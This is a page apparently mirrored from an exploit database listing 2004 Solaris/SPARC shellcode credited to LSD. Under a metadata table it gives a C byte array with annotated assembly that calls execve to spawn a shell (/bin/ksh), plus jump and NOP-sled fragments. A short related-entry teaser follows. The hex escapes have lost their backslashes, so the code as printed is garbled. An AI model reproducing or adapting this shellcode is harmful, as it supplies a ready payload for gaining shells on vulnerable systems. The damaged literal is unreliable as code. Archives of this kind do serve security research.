Solaris/SPARC – execve(/bin/sh) Shellcode (52 bytes)-安全小百科

Solaris/SPARC – execve(/bin/sh) Shellcode (52 bytes)

漏洞ID	1054639	漏洞类型
发布时间	2004-09-26	更新时间	2004-09-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Solaris_SPARC	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13494

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

//Solaris/Sparc - LSD
char shellcode[]=
    "x20xbfxffxff"     /* bn,a    <shellcode-4>        */
    "x20xbfxffxff"     /* bn,a    <shellcode>          */
    "x7fxffxffxff"     /* call    <shellcode+4>        */
    "x90x03xe0x20"     /* add     %o7,32,%o0           */
    "x92x02x20x10"     /* add     %o0,16,%o1           */
    "xc0x22x20x08"     /* st      %g0,[%o0+8]          */
    "xd0x22x20x10"     /* st      %o0,[%o0+16]         */
    "xc0x22x20x14"     /* st      %g0,[%o0+20]         */
    "x82x10x20x0b"     /* mov     0xb,%g1              */
    "x91xd0x20x08"     /* ta      8                    */
    "/bin/ksh"
;

char jump[]=
    "x81xc3xe0x08"     /* jmp     %o7+8                */
    "x90x10x00x0e"     /* mov     %sp,%o0              */
;

static char nop[]="x80x1cx40x11";

# milw0rm.com [2004-09-26]

相关推荐: QuadComm Q-Shop 2.5 – Failure To Validate Credentials

QuadComm Q-Shop 2.5 – Failure To Validate Credentials 漏洞ID 1054022 漏洞类型发布时间 2003-07-09 更新时间 2003-07-09 CVE编号 N/A CNNVD-ID N/A 漏洞平…

文章版权归作者所有，未经允许请勿转载。

THE END